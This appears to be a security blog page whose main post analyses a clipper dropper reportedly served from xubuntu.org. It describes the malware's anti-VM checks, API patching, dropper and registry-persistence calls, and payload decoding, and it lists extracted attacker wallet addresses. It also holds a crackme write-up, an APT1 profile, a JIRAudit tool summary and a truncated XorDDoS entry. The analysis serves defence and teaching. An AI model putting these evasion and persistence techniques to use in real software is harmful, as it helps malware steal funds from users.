Analyzing Malware distributed by Xubuntu.org

Yesterday I discovered a malware incident that was distributed via the official Xubuntu website.
There is already a Reddit post that largely corroborates the incident.



Today I’m going to take a closer look at that malware sample.
SHA256: ec3a45882d8734fcff4a0b8654d702c6de8834b6532b821c083c1591a0217826.
The sample I analyzed is available on abuse.ch

(Tip for readers: always verify hashes from a trusted source before interacting with a sample.)

After downloading the sample I inspected its file metadata. This sample is not a native Win32 executable with x86 code, it is a .NET assembly. You can usually spot that with file or by looking for the CLR header (IMAGE_COR20) in the PE.

PE32 executable for MS Windows (GUI), Intel i386 Mono/.Net assembly

Concretely: the PE contains managed CIL/IL (Intermediate Language) and only a tiny native stub whose entry point calls _CorExeMain() (from mscoree.dll) to bootstrap the CLR. That means tools like Ghidra will show only a stub at the PE entry (the real logic lives in CLR metadata streams such as #~, #Strings and #Blob) and will not produce decompiled C# by default.

This pattern is typical for C#-based loader/dropper families. They often present a legitimate UI (in this case “SafeDownloader”) but hide malicious actions such as:

  • anti-VM / anti-debug checks
  • writing/extracting an encrypted payload to disk
  • creating persistence via registry autostart entries

For analysis I use ILSpy to decompile the managed code, Ghidra only shows the PE boot stub; the real logic is in the managed metadata and IL.

I decompiled the sample using ILSpy (CLI) with:

~/.dotnet/tools/ilspycmd -o ./decomp_output ec3a45882d8734fcff4a0b8654d702c6de8834b6532b821c083c1591a0217826.exe

Result:

ec3a45882d8734fcff4a0b8654d702c6de8834b6532b821c083c1591a0217826.decompiled.cs

After decompilation we get the Decompiled C# files the code I used for analysis is available on my GitHub.

The program is a WPF GUI wrapper (SafeDownloader) that social-engineers the user by showing Ubuntu/Xubuntu ISO links. When the user clicks Generate, the app calls an internal routine (named W.UnPRslEqVw() in the decompiled code) that is the real malware routine executed in the background.


Malware behavior (detailed)


Anti-analysis & sandbox evasion.

The loader first performs anti-analysis checks:

  • Debugger detection: Debugger.IsAttached and native IsDebuggerPresent() via kernel32.
  • Virtualization detection: uses WMI (ManagementObjectSearcher) to query system manufacturer/model and looks for keywords such as VMware, VirtualBox, QEMU, Parallels, Microsoft Corporation (common in VM images).

If any probe indicates a debug/VM environment, the program calls Environment.Exit(0) and quits, preventing payload execution in sandboxes.


API patching / self-modification

Self-modification / in-memory API patching:

The code modifies bytes in loaded system libraries (e.g. kernel32.dll and ntdll.dll). One patch replaces instructions with 0xC3 (a RET) to neuter functions (for example to alter the behavior of Sleep/delay functions used by sandboxes).
Another patch wrtes attacker-supplied bytes (XOR-decrypted) into memory

This is effectively inline hooking / API patching and can alter the behavior of timing/registry functions or attempt to disable runtime hooks that monitoring software or AV products use.


Dropper

The loader drops a second-stage executable:

CreateDirectoryNative(text2);
WriteFileNative(text3, data);
MoveFileNative(text3, text4);
SetAttributesNative(..., attributes);
  • creates a folder under %APPDATA% (via Environment.SpecialFolder.ApplicationData),
  • writes a Base64-encoded blob (then XOR-decoded with key 0xF7) into a .tmp file,
  • renames the .tmp to .exe, and sets file attributes (hidden/system) via native calls.

These helpers correspond to CreateDirectory, CreateFile/WriteFile, MoveFile, and attribute-setting wrappers in the code.


Registry persistence

SetRegistryPersistence(text4, regPath);

The sample writes an autostart entry into the registry using low-level APIs (NtSetValueKey from ntdll and RegOpenKeyEx from advapi32) to store a randomly generated value name with the path to the dropped EXE. Because it writes directly via native system calls (instead of higher-level wrappers), this may be an attempt to confuse or bypass some detection mechanisms that watch common API usage.


Execution & single-instance check

Before launching the dropped executable the loader checks whether a process with the same name is already running. If it is not, the loader starts the dropped binary, this avoids multiple simultaneous instances.


UI deception

The WPF UI displays legitimate Ubuntu download links to build trust. The user sees nothing suspicious while the loader writes the payload to disk, establishes persistence, and executes the dropped binary in the background.


Extracting and decoding the dropped payload

As we can see here, there is another Base64-encoded and XOR-obfuscated payload (XOR key = 247 / 0xF7) stored in the variable data:

I exported the Base64 blob to dropper_isolated.b64 and decoded + XOR-decoded it with:

python3 -c 'import base64; import sys; data = base64.b64decode(open("dropper_isolated.b64").read()); data = bytes([b ^ 0xF7 for b in data]); open("payload.bin","wb").write(data)'

The result payload.bin is a new PE native executable (x86 machine code), not a .NET assembly

I uploaded that binary to VirusTotal for a quick scan:

VirusTotal flags the payload as malicious and indicates that it is a cryptocurrency clipper, malware that monitors the Windows clipboard for crypto wallet addresses and replaces them with attacker-owned addresses so funds are redirected to the attacker’s wallet. With this classification we can pivot to a deeper static analysis (I used Ghidra for the native PE).

The native binary is small and relatively easy to analyze:

A quick strings scan shows clipboard-related APIs (OpenClipboard, GetClipboardData, SetClipboardData) a stronng indicator of clipper behavior.

A quick strings scan shows clipboard-related APIs (OpenClipboard, GetClipboardData, SetClipboardData) a strong indicator of clipper behavior.
I navigated to the function that implements these calls (named FUN_1400016b0 in my Ghidra session).


Clipboard routine overview.
The function reads the Windows clipboard:

  • opens the clipboard and calls GetClipboardData(CF_TEXT),
  • validates that the clipboard bytes are text and contain only characters typical for wallet addresses (alphanumeric, : or _)
  • then performs prefix checks to identify the coin type.

Prefix checks & coin type mapping.
The malware performs a series of prefix checks to detect the wallet type. From the decompiled logic the mapping is:

Bitcoin:
(*pcVar4 - 0x31U & 0xfd) == 0 oder strncmp(pcVar4, &DAT_140004034, 3)` | (1 / 3...)

Litecoin:
strncmp(pcVar4, &DAT_14000402c, 4) oder (*pcVar4 + 0xb4U) < 2

ETH:
strncmp(pcVar4, &DAT_140004028, 2) → "0x"

DOGE:
cVar1 == 'D'

TRON:
cVar1 == 'T'

XRP:
cVar1 == 'r'

Where to find the addresses:

For each coin type the malware assembles the attacker’s address from two parts:

  • several 32-bit constants (_DAT_140004100, _DAT_140004104, …)
    eight 4-byte words = 32 ASCII characters (little-endian dword representation)
  • a short tail derived by XOR-ing bytes taken from another data blob (e.g. DAT_0x1400031c0) with 0x15
    The tail length varies (commonly 2–10 bytes depending on coin), and it completes the address (including checksum)


You can verify a single dword with Python:

python3 -c "import struct; print(struct.pack('<I', 0x71316362).decode('ascii'))"

The result:

bc1q

So the first dword decodes to bc1q, the signature prefix of a Bech32 Bitcoin address.

This is how i build the tail by merging the byte chunks:

The 32-character string obtained from the dwords is only the first part. The function then computes additional tail bytes by XOR-ing bytes from a separate data region (e.g. DAT_1400031c0) with 0x15 and appends them.
Those tail bytes complete the address (including checksum).
If you only decode the dwords, the address will fail checksum validation, you must XOR-decode and append the tail bytes to get a valid address.


Full address assembly (summary)
The malware writes eight 32-bit constants (32 ASCII chars) and then fills a small tail array with bytes computed as DAT_src[i] ^ 0x15 (tail length varies). The full address is dword_ascii + xor_tail.
It then GlobalAllocs a clipboard buffer and calls SetClipboardData(CF_TEXT, ...) to replace the clipboard contents.



To recover the tail bytes:

dump the bytes at the VA (e.g. 0x1400031c0) with a binary tool (I used radare2; you can also use Ghidra or xxd), for example:

76 78 25 2D 60 64 7D 23 25 63 

XOR each raw byte with 0x15 (the deobfuscation key embedded in the code). You can do this in CyberChef: From Hex -> XOR (key: 15 hex) -> To String.

Output:

cm08uqh60v

Appending that to the 32-char dword string yields the full Bech32 address:

bc1qrzh7d0yy8c3arqxc23twkjujxxax + cm08uqh60v = bc1qrzh7d0yy8c3arqxc23twkjujxxaxcm08uqh60v

I applied the same method to other coin branches and extracted the following attacker addresses from the binary.

Extracted addresses:
I applied the same method to other coin branches and extracted the following attacker addresses from the binary:

  • Bitcoin (Bech32): bc1qrzh7d0yy8c3arqxc23twkjujxxaxcm08uqh60v
  • Litecoin: LQ4B4aJqUH92BgtDseWxiCRn45Q8eHzTkH
  • Ethereum / BSC style (hex): 0x10A8B2e2790879FFCdE514DdE615b4732312252D
  • Dogecoin: DQzrwvUJTXBxAbYiynzACLntrY4i9mMs7D
  • Tron (TRX): TW93HYbyptRYsXj1rkHWyVUpps2anK12hg
  • XRP (Ripple): r9vQFVwRxSkpFavwA9HefPFkWaWBQxy4pU
  • Cardano: addr1q9atfml5cew4hx0z09xu7mj7fazv445z4xyr5gtqh6c9p4r6knhlf3jatwv7y72deah9un6yettg92vg8gskp04s2r2qren6tw

These are the final wallet addresses embedded in this sample (per the static reconstruction). I didn’t find any additional interesting functionality in the binary beyond the dropper/clipper behavior.


TL;DR

I found a C# WPF loader distributed via an Xubuntu download page that drops a native clipper payload.
The loader includes anti-VM and anti-debug checks, in-memory API patching, drops and runs a second-stage PE, and the second stage is a clipboard clipper that replaces wallet addresses with attacker-owned addresses.
I statically reconstructed the attacker wallets from embedded dwords + XOR tails and found several addresses for BTC, LTC, ETH, DOGE, TRX, XRP and Cardano. No transactions were observed at the time of analysis.


A short critique; why the threat actor did a surprisingly poor job despite compromising xubuntu.org

It’s striking how many basic operational security and quality of work mistakes this actor made, mistakes that turned what could have been a high-impact supply-chain compromise into a relatively easy forensic win for analysts.

Concrete failures observed

  • Amateur packaging: shipping a ZIP that claims to contain a torrent but actually contains an .exe and a tos.txt is a glaring red flag. That mismatched user experience (and the presence of an executable in a “torrent” download) makes the payload obvious to even casual users and automated scanners.
  • Sloppy metadata: the tos.txt claims “© 2026 Xubuntu.org” while it’s 2025. Small details like anachronistic timestamps or incorrect copyright years are low-effort giveaways that something is off.
  • Poor obfuscation / easy static recovery: the attacker embedded wallet strings as readable dwords plus simple XOR tails. Those artifacts were trivially reconstructable with basic tooling (radare2/CyberChef/Python). Even the XOR keyss were visible in the decompiled code. That means the malicious addresses, the primary goal of the clipper were recoverable without dynamic execution.
  • Malformed or inconsistent artifacts: some extracted addresses failed checksum validation (or appeared intentionally malformed). That suggests rushed assembly, faulty encoding, or placeholders left in again lowering the bar for detection and denying the attacker guaranteed success.
  • Over-reliance on a single trick: using a compromised site to host a ZIP is effective in general, but the actor did not sufficiently hide operational traces nor build fallback delivery strategies. When defenders inspected the file, the entire chain unraveled quickly.

Why these mistakes matter

  • They reduced the attacker’s window of opportunity. Instead of a stealthy supply-chain drop that could reap long-lived infections, the compromise was noisy and trivially triaged.
  • They made attribution and indicator extraction easy: embedded addresses, simple XOR keys, and clear code paths gave analysts immediate IoCs (wallets, hashes, strings).
  • They increased the chances of swift remediation by the vendor and faster takedown by infrastructure providers.

Final thought
The actor clearly reached a valuable target, the official download infrastructure, but their execution quality was low. That combination (high opportunity + poor tradecraft) is exactly what defenders want: an incident with high signal and relatively low analytical cost. The silver lining here is that sloppy attackers give security teams the evidence they need to respond quickly and to harden distribution chains for the future.

Crackme – RodrigoTeixeira’s Very easy disassembly execise


Since I want to dive deeper into reverse engineering, I’ve decided to regularly solve CrackMe challenges from https://crackmes.one; I’ll begin with low-difficulty ones and gradually work my way up to harder challenges.

I chose this approach because it’s a practical way to build and demonstrate the fundamentals, reverse engineering can be overwhelming at first, so starting with simpler tasks helps establish a reliable foundation.

Today’s CrackMe is by Rodrigo Teixeira and is rated 1.1 in difficulty; you can find it here: https://crackmes.one/crackme/68a346c48fac2855fe6fb6df.

Because this is a fairly simple exercise, I’ll analyze it with radare2 instead of Ghidra, partly to avoid making the task trivial and I’ll concentrate on how to translate assembly into readable pseudo-C code step by step.
I recommend gaining a basic understanding of Assembly and the C programming language before diving in. I’ll keep this write-up as beginner-friendly as possible and have included links to resources that explain any terminology that might be unfamiliar to newcomers, if you have any questions, feel free to contact me.

If you want to dive deeper into radare2 commands, i recommend reading it’s official documentation or the following cheatsheet.
Here is a list of references for research used in this WriteUp:

– General Reverse Engineering & x86 Assembly

Intel® 64 and IA-32 Architectures Software Developer’s Manuals
https://www.intel.com/content/www/us/en/developer/articles/technical/intel-sdm.html
x86 Instruction Reference
https://wiki.osdev.org/X86-64
PC Assembly Language by Paul A. Carter
https://pacman128.github.io/static/pcasm-book.pdf

– Windows Internals & PE File Format

Microsoft PE/COFF Specification
https://learn.microsoft.com/en-us/windows/win32/debug/pe-format

– radare2

radare2 Book (official)
https://book.rada.re
r2wiki Cheat Sheet
https://r2wiki.readthedocs.io/en/latest/home/misc/cheatsheet/

– Calling Conventions & ABI

System V i386 ABI
https://refspecs.linuxfoundation.org/elf/abi386-4.pdf
Microsoft x64 Calling Convention
https://learn.microsoft.com/en-us/cpp/build/x64-calling-convention

– Beginner-Friendly Practical Resources

Crackmes.one Platform
https://crackmes.one
0x00sec Reverse Engineering Category
https://0x00sec.org/c/reverse-engineering/
OpenSecurityTraining: Intro to x86
https://p.ost2.fyi/courses/course-v1:OpenSecurityTraining2+Arch1001_x86-64_Asm+2021_v1/about

After downloading the binary, the first thing I’ll do is launch radare2 with the -A option to run an automatic analysis pass.

Once radare2 has loaded the binary, you can type i to display detailed information about the loaded excutable.

The binary is a Windows Portable Executable (PE) file. A Portable Executable file is a format used for executable and object files in Windows operating systems, based on the Common Object File Format (COFF). It’s used for files such as .exe, .dll, .sys, and others. The structure begins with a 64-byte MS-DOS header starting with the characters “MZ” (0x5A4D) and includes an offset field (e_lfanew) that points to the actual PE header.
In PE files, it’s important to distinguish between file offsets (positions in the raw file) and virtual addresses (VA), which are used once the file is loaded into memory.
In radare2, s 0 moves to the file offset 0x0, while s baddr jumps to the binary’s base virtual address (usually 0x00400000 for Windows executables).

You can inspect the e_lfanew field with:

pv4 @ 0x3c

This gives the offset to the PE header.
If the result is 0xffffffff, it typically means the memory region isn’t mapped or is filled with placeholder bytes (0xFF).

We can also verify this by entering the following command:

s 0
# Shows the MS-DOS header ("MZ ...")
px 64 @ 0 

As expected, you can see the “MZ” signature (0x4D5A) at the beginning of the header.
PE files (like all Windows binaries) use little-endian byte order, meaning the least significant byte comes first.
In radare2:

px 4 @ 0x3c    ; shows raw bytes (in little-endian order)
pv4 @ 0x3c     ; interprets those 4 bytes as a 32-bit integer

You can also use pf to parse structured data, for example:

pf 2s e_magic; 58x; 4u e_lfanew @ 0

This reads the e_magic signature and the e_lfanew offset in one step, making PE header inspection much clearer.


Now I’ll run afl to list the functions that radare2 discovered in this binary.
The list is extensive, but we’re specifically looking for the entry function where the executable begins execution.

The entry function is located at 0x00401a00; radare2 has already taken us there automatically, but you can jump to it manually with s 0x00401a00.

Using afl~main we can list all functions whose names include “main.”

To display the assembly code for this function, I can use the command pdf @ sym._main.

Now we can translate the given assembly into pseudocode to better visualize what the function is doing.
I’ll start by deriving the function signature (parameters and return type). Here’s the general approach:

Identify the calling convention

  • In the epilogue:
    • ret -> cdecl (the caller cleans up the arguments)
    • ret N -> stdcall (the callee cleans up N bytes = number of arguments × 4)
  • Register-based conventions:
    • thiscall (MSVC): ecx holds this
    • fastcall: the first arguments are passed in ecx and edx

Count the number of arguments

  • For stdcall: the number of arguments = imm in ret imm / 4
  • For cdecl:
    • Count the push instructions (or mov [esp+…]) before the call in the caller function
    • Example: three push instructions -> three arguments
  • If the callee references its arguments directly:
    • [ebp+8] -> first argument
    • [ebp+0xC] -> second argument, and so on.

Determine the return type
Check the final instructions in the function body:

  • Used as an address -> pointer
  • Value returned in eax (32-bit) -> int, bool, or pointer
  • Value returned in edx:eax -> 64-bit integer
  • Value returned via st0 (FPU) -> float or double (common with fld/fstp)
  • (SSE returns on x86-32 are rare; on x64 they use xmm0.)

Consider semantics:

  • Only 0 or 1 -> likely bool
  • Multiple values or error codes -> int

Now, for our specific case:

Since the callee doesn’t use any parameters in its data flow, we move to its caller (the CRT startup routine).
In PE/MinGW, the startup sequence typically goes like this:
mainCRTStartup -> __tmainCRTStartup -> ___main or __mingw32_init_mainargs -> _main(argc, argv, envp)

Identifiying CRT vs. User Code:

When analyzing Windows executables, you’ll often see functions like ___main, mainCRTStartup, or __tmainCRTStartup.
These belong to the C Runtime (CRT) and handle setup tasks such as initializing global variables, the floating-point environment, and calling your actual main function.
A quick rule of thumb: if the function name starts with multiple underscores or manipulates environment or FPU state (fldenv, fninit, ldmxcsr), it’s part of the CRT, not user-written code.

We can now inspect the call sites in radare2.
Looking at the initial disassembly output, we can identify the relevant line:

; CALL XREF from fcn.004011b0 @ 0x401283(x)

This shows the address of the call site.
We can jump to that address and review the instructions leading up to the call with:

s 0x401283
pd -30
pd 20

Here we can see the typical behavior of the C runtime (CRT), which retrieves the arguments from global variables and passes them to main using a push-less call convention.

Push-less Call Convention? What is that? (CLICK)

Some compilers (like GCC or MinGW) don’t use the traditional push instructions for function arguments.
Instead, they write the argument directly onto the stack with mov [esp], value and then call the function.
When the call instruction executes, it automatically pushes the return address, which shifts the argument down to [esp+4]exactly where the callee expects it according to the cdecl calling convention.

Example:

mov [esp], 0x405064   ; write argument (string address)
call printf            ; CPU pushes return address -> arg at [esp+4]

This technique saves instructions and is known as a push-less call setup.

0x00401267  e8 8c28....    call ___p__environ
0x0040126c  8b 00           mov  eax, dword [eax]
0x0040126e  89 44 24 08     mov  [var_8h], eax

Here’s a brief explanation of the assembly code:
___p__environ() returns a pointer to the global variable environ, which is of type char***.
mov eax, [eax] dereferences it once, so eax now holds a char** the actual envp pointer.
This value is then stored in var_8h, effectively setting envp = environ;.

0x00401272  a1 00 70 40 00  mov  eax, [0x407000]
0x00401277  89 44 24 04     mov  [var_4h], eax

[0x407000] is a CRT global variable, typically representing __argc.
Therefore, var_4h receives the value of argc, effectively making it argc = __argc;.

0x0040127b  a1 04 70 40 00  mov  eax, [0x407004]
0x00401280  89 04 24        mov  [esp], eax      ; char **argv

[0x407004] is the CRT global variable for __argv, which is of type char**.
mov [esp], eax writes the first function argument directly onto the top of the stack without using a push instruction.
This is a common compiler pattern known as a “push-less call setup,” meaning argv is now prepared as the first parameter for the upcoming function call.

0x00401283  e8 d8 01 00 00  call sym._main      ; int main(char **argv)

The call uses exactly what’s currently stored in [esp], which is argv.
That’s why radare2 annotates the function signature as int main(char **argv)only argv is passed as an argument.

Now that we understand how the parameter passing works, we can start writing our first pseudocode.

<RETURN-TYPE> main(char **argv) {}

We still need to determine the return type for the function signature, which should be relatively easy to identify. To do this, I’ll take a look at the final instructions of our assembly function.

│       └─> 0x004014a5      b800000000     mov eax, 0 
│           0x004014aa      c9             leave
└           0x004014ab      c3             ret

mov eax, 0 gives us a clear indication of the return type. To determine it, it’s useful to look at which register is being used in the mov instruction right before the leave and ret sequence.
In 32-bit code, the return value is always stored in the EAX register.
This follows the ABI (Application Binary Interface) convention, which applies to all languages that adhere to C calling conventions such as C, C++, Pascal, and stdcall.

Calling Conventions? What is that? (CLICK)

Understanding the calling convention is essential when reconstructing a function’s signature.
You can often identify it by looking at how the stack is cleaned up and how arguments are passed:

ConventionStack CleanupArgument PassingTypical Pattern
cdeclCallervia stack (push / mov [esp+..])ret
stdcallCalleevia stackret N (N = args × 4)
fastcallCalleefirst args in ecx, edxret N
thiscallCalleeecx = this (C++)ret N

If the callee doesn’t access any arguments directly, inspect the call site instead — count how many push or mov [esp+..] instructions occur before the call. That number tells you how many parameters are passed.

Rückgabetyp (in C)RegisterGröße
int, bool, pointerEAX4 Bytes
floatST0 (FPU)4 Bytes
doubleST0 (FPU)8 Bytes
long longEDX:EAX8 Bytes zusammengesetzt

We can therefore confidently conclude that the return value is an integer, allowing us to expand our pseudocode accordingly.

int main(char **argv) {}

We can therefore confidently conclude that the return value is an integer and expand our pseudocode accordingly.

Now we can finally focus on analyzing the data flow and translating it step by step.

The prologue of the function can be ignored when writing our pseudocode, it is responsible for setting up the stack frame, aligning the stack to 16 bytes, reserving local variables, and initializing the C runtime (CRT).

Stack frame? What is that? (CLICK)

At the beginning of a function, the compiler sets up what’s called a stack frame.
sub esp, 0x20 reserves 32 bytes (0x20) on the stack for local variables.
Each local variable is located at a specific offset relative to either esp or ebp.

Example:

esp+0x00 → return address (after the call)
esp+0x04 → first function argument
esp+0x1C → local variable var_1ch

So, lea eax, [var_1ch] loads the address of that local variable into eax, not its value.

At the end of the function, the leave instruction restores the previous stack frame, and ret pops the return address to resume execution at the caller.

55                    push ebp
89 e5                 mov ebp, esp
83 e4 f0              and esp, 0xfffffff0      ; 16-Byte-Alignment
83 ec 20              sub esp, 0x20            ; 32 Byte local variables
e8 72 05 00 00        call ___main             ; CRT/MinGW-Init

The first section of code that we can meaningfully translate begins at address 0x0040146e:

esp+00  <- Here, the compiler immediately stores the first function argument (push-less).
esp+04  <- 2. Argument
...
esp+1C  <- local int  (radare: var_1ch)

The first section of code that we can meaningfully translate begins at address 0x0040146e:

0x0040146e      c704246450..   mov dword [esp], str.Enter_password__int_: ; [0x405064:4]=0x65746e45 ; "Enter password (int): " ; const char *format
0x00401475      e80e260000     call sym._printf            ; int printf(const char *format)

At address 0x0040146e, the instruction writes the 32-bit value 0x405064 the address of the C string constant "Enter password (int): " stored in the .rdata section to the top of the stack ([esp]).
This represents a push-less argument setup: instead of using push imm32, the compiler writes the first function argument directly into the stack slot. This pattern is typical for GCC and MinGW.

Immediately afterward, the function printf is called to print the string. During the call, the CPU automatically pushes the return address onto the stack, which decreases esp by 4 bytes.

We can now extend our pseudocode as follows:

int main(char **argv) {
    printf("Enter password (int): ");
}

Now let’s examine the next four lines:

0x0040147a      8d44241c       lea eax, [var_1ch]
0x0040147e      89442404       mov dword [var_4h], eax
0x00401482      c704247b50..   mov dword [esp], 0x40507b   ; '{P@'
                                                           ; [0x40507b:4]=0x59006425 ; "%d" ; const char *format0x00401489      e8ea250000     call sym._scanf      ; int scanf(const char *format)

At address 0x0040147a, we can see that the function’s stack frame contains a local variable at offset 0x1C, var_1ch is radare2’s symbolic name for the stack slot at [esp+0x1c] (i.e., a local 0x1C bytes into the 0x20-byte frame reserved by sub esp, 0x20).

This variable is not initialized and, as we can see in the final instruction of this block, it is used as the destination for the scanf call to store the user input.

We can incorporate this information directly into our pseudocode:

int main(char **argv) {
    printf("Enter password (int): ");
    int input;
    scanf("%d", &input);
}

Our code is slowly starting to take shape and gain some structure, so let’s move on and analyze the remaining instructions:

│           0x00401492      3d90e70100     cmp eax, 0x1e790
│       ┌─< 0x00401497      750c           jne 0x4014a5
│       │   0x00401499      c704247e50..   mov dword [esp], str.You_got_it___ ; [0x40507e:4]=0x20756f59 ; "You got it ;)" ; const char *format
│       │   0x004014a0      e8e3250000     call sym._printf            ; int printf(const char *format)
...
│       └─> 0x004014a5      b800000000     mov eax, 0
│           0x004014aa      c9             leave
└           0x004014ab      c3             ret
            0x004014ac      6690           nop

cmp eax, 0x1e790 compares the value in EAX (previously loaded from [var_1ch], i.e. the user-input) with the 32-bit constant 0x001E790 (decimal 124816), which is important for our CrackMe Challenge, this is effectively the flag; the CPU updates the status flags (including the Zero Flag, ZF) as a result.

Translating Comparisons and Flags into if Statements (CLICK)

The cmp instruction sets CPU status flags based on the result of a subtraction (A - B), and conditional jumps like je, jne, or jg use those flags to control flow.

InstructionCondition (Flag)High-Level Equivalent
je / jzZF = 1if (A == B)
jne / jnzZF = 0if (A != B)
jg / jnleZF=0 & SF=OFif (A > B)
jl / jngeSF≠OFif (A < B)

Example:

cmp eax, 0x1e790
jne 0x4014a5

translates to

if (input != 124816) goto 0x4014a5;

Tip: You can quickly convert hexadecimal to decimal in radare2 with

? 0x1e790



0x00401497 jne 0x4014a5 is “jump if not equal”: it branches only when ZF == 0 (values unequal); if the input != 124816 execution jumps to 0x4014a5, skipping the subsequent print.

If EAX == 0x1E790 (ZF == 1), execution falls through to the next block: mov dword [esp], 0x40507e writes the address of the C string "You got it ;)" (located in .rdata at 0x40507e) into [esp] as the first function argument, a push-less argument setup (instead of push imm32).

call sym._printf invokes printf(const char *format); the call pushes the return address so that printf finds its first argument at [esp+4], consistent with the cdecl/varargs calling convention.

Finally, mov eax, 0 loads the immediate value 0 into EAX (overwriting any previous content); under the 32-bit cdecl ABI EAX is the standard return register, so this corresponds to return 0;. leave restores the stack frame (mov esp, ebp; pop ebp), and ret returns control to the caller.

Identifying and understanding is a Keyskill for writing Pseudocode, so


int main(char **argv) {
    printf("Enter password (int): ");
    int input;
    scanf("%d", &input);
    if (input == 124816) {
        printf("You got it ;)");
    }

    return 0
}

With this, we now have both the flag (124816) and the pseudocode for the challenge; I hope you were able to follow along and take something useful from my write-up. If you have feedback or questions, feel free to comment or contact me.

I also recommend reviewing all linked resources, as they can be very helpful if you want to dive deeper into reverse engineering 🙂

APT1

APT1 (Comment Crew / Shanghai Group) – Quick Facts

  • Type: Advanced Persistent Threat (APT)
  • Aliases: Comment Crew, Comment Group, Comment Panda, Unit 61398.
  • Origin: China, linked to PLA Unit 61398
  • Active Since: Mid-2000s
  • Primary Targets: Western corporations, government organizations, defense contractors
  • Motivation: Cyber espionage, intellectual property theft
  • Tactics & Techniques:
    • Spear-phishing emails
    • Custom malware and remote access tools (RATs)
    • Long-term network infiltration for intelligence gathering
  • Notable Campaigns:
    • Exfiltration of corporate data across multiple industries, including aerospace, energy, and technology
  • Significance:
    • One of the first publicly documented APT groups
    • Exposed in Mandiant’s 2013 report, raising global awareness of state-sponsored cyber espionage
  • Attributed Tools & Malware:
    • Malware Samples & More Malware Samples
    • WEBC2 Family:
      • WEBC2-AUSOV
      • WEBC2-ADSPACE
      • WEBC2-BOLID
      • WEBC2-CLOVER
      • WEBC2-CSON
      • WEBC2-DIV
      • WEBC2-GREENCAT
      • WEBC2-HEAD
      • WEBC2-KT3
      • WEBC2-QBP
      • WEBC2-RAVE
      • WEBC2-TABLE
      • WEBC2-TOCK
      • WEBC2-UGX
      • WEBC2-YAHOO
      • WEBC2-Y21K
    • GOGGLES – Downloader used by the group (serves as a payload/secondary-stage downloader).
    • GLASSES – A variant or close relative of GOGGLES; identified in a Citizen Lab analysis and likely an earlier or related implementation.
    • AURIGA / BANGAT – Tools linked to a developer tracked as “SuperHard”; mentioned by Mandiant but not always named in the public report.
    • Email-exfiltration utilities: GETMAIL (used to extract PST files) and MAPIGET (used to read emails that haven’t been archived).
    • Public privilege-escalation tools: examples include cachedump, fgdump, and gsecdump, not unique to APT1 but observed in their operations.
    • HTRAN (HUC Packet Transmit Tool) – used as a hop/proxy relay to forward communications between victims and command-and-control servers, helping to obscure origin and routing.
  • MITRE ATT&CK: https://attack.mitre.org/groups/G0006/

Description

APT1, often called the Comment Crew or PLA Unit 61398, is one of the most infamous and well-documented cyber espionage groups linked to the Chinese government. First brought into the spotlight by Mandiant’s 2013 report, APT1 was among the first hacking units publicly tied to a specific branch of China’s military, the People’s Liberation Army, revealing the true scale of state-backed digital espionage for economic and strategic gain.

Active since at least 2006, APT1 ran one of the most disciplined and long-running hacking operations ever uncovered. Its members focused on stealing intellectual property and confidential business information from hundreds of organizations across industries like aerospace, defense, energy, telecom, and manufacturing – mostly in the United States, but also in Europe and Asia. Everything they took seemed to serve China’s national interests, whether by boosting its industries or informing military and political strategies.

Technically, APT1 was known for its methodical and repeatable playbook. The group broke in through targeted phishing emails and custom malware such as the WEBC2 family (with variants like WEBC2-AUSOV and WEBC2-GREENCAT). Once inside, they established persistence with credential-stealing tools (GETMAIL, MAPIGET, FGDump) and routed stolen data through a vast command-and-control network of more than 1,000 servers and 2,500 domains, often masked with tools like HTRAN to hide their tracks. Their infrastructure and coding style were remarkably consistent, the work of full-time engineers, not lone hackers.

What made APT1 stand out wasn’t just the scale of its operations, but the professionalism behind it. Investigators found evidence of shift-based work hours, organized infrastructure, and shared codebases, all pointing to a state-run, military-grade espionage unit based in Shanghai. The exposure of APT1 changed how the world viewed cyber conflict, proving that digital espionage could be conducted with the same structure and intent as any traditional military campaign.

In many ways, APT1 set the template for the modern nation-state hacking group: large, organized, patient, and focused on long-term strategic advantage rather than chaos or quick profit. Its legacy still shapes how governments and companies think about cybersecurity and geopolitical risk today.

References:

JIRAudit

Dein Open-Source-Tool für Sicherheits-Audits in Jira Server & Data Center

In der heutigen Zeit, in der Datenschutz und Compliance oberste Priorität haben, ist es entscheidend, die Sicherheit und Integrität deiner Jira-Instanz regelmäßig zu überprüfen. Während Jira über eingebaute Audit-Logs verfügt, bieten diese oft nicht die Tiefe und Flexibilität, die für umfassende Sicherheitsanalysen erforderlich sind. Hier kommt JIRAudit ins Spiel, ein Open-Source-Tool, das speziell für Jira Server und Data Center entwickelt wurde.


Was ist JIRAudit?

JIRAudit ist ein Python-basiertes Sicherheits-Audit-Tool, das entwickelt wurde, um Sicherheitslücken in Jira-Instanzen zu identifizieren. Es bietet eine detaillierte Analyse von Benutzerberechtigungen, installierten Plugins, Systemkonfigurationen und mehr. Das Tool hilft Administratoren dabei, potenzielle Sicherheitsrisiken zu erkennen und entsprechende Maßnahmen zu ergreifen.


Hauptfunktionen im Überblick

  • Benutzer- und Berechtigungsanalyse: Überprüft Benutzerkonten und deren Berechtigungen, um sicherzustellen, dass keine unnötigen oder übermäßigen Rechte vergeben wurden.
  • Plugin-Überprüfung: Identifiziert installierte Plugins und bewertet deren Sicherheitsstatus, um potenzielle Schwachstellen zu erkennen.
  • Systemkonfigurationsanalyse: Analysiert die Jira-Systemkonfiguration auf Best Practices und Sicherheitslücken.
  • Berichterstattung: Generiert detaillierte Berichte, die Administratoren bei der Behebung von Sicherheitsproblemen unterstützen.

Vorteile von JIRAudit

  • Open Source: JIRAudit ist unter der Apache-2.0-Lizenz verfügbar, was bedeutet, dass es kostenlos genutzt, modifiziert und verteilt werden kann.
  • Regelmäßige Updates: Das Tool wird kontinuierlich aktualisiert, um mit den neuesten Jira-Versionen und Sicherheitstrends Schritt zu halten.
  • Einfache Integration: Dank seiner Python-Basis lässt sich JIRAudit problemlos in bestehende DevOps- und CI/CD-Pipelines integrieren.

So setzt du JIRAudit ein

  1. Installation: Lade das neueste Release von GitHub herunter.
  2. Konfiguration: Passe die settings.py-Datei an deine Jira-Instanz an.
  3. Ausführung: Führe das Tool über die Kommandozeile aus: python JIRAudit.py
  4. Analyse: Überprüfe die generierten Berichte auf potenzielle Sicherheitsrisiken.

Weitere Ressourcen

XORDDoS


Malware Name / Type

  • Name: XorDDoS (aka XOR DDoS)
  • Type: Linux Trojan / DDoS botnet (rootkit-capable)

Quick Summary

  • First Seen / Known Since: First publicly reported in 2014 (discovered by MalwareMustDie).
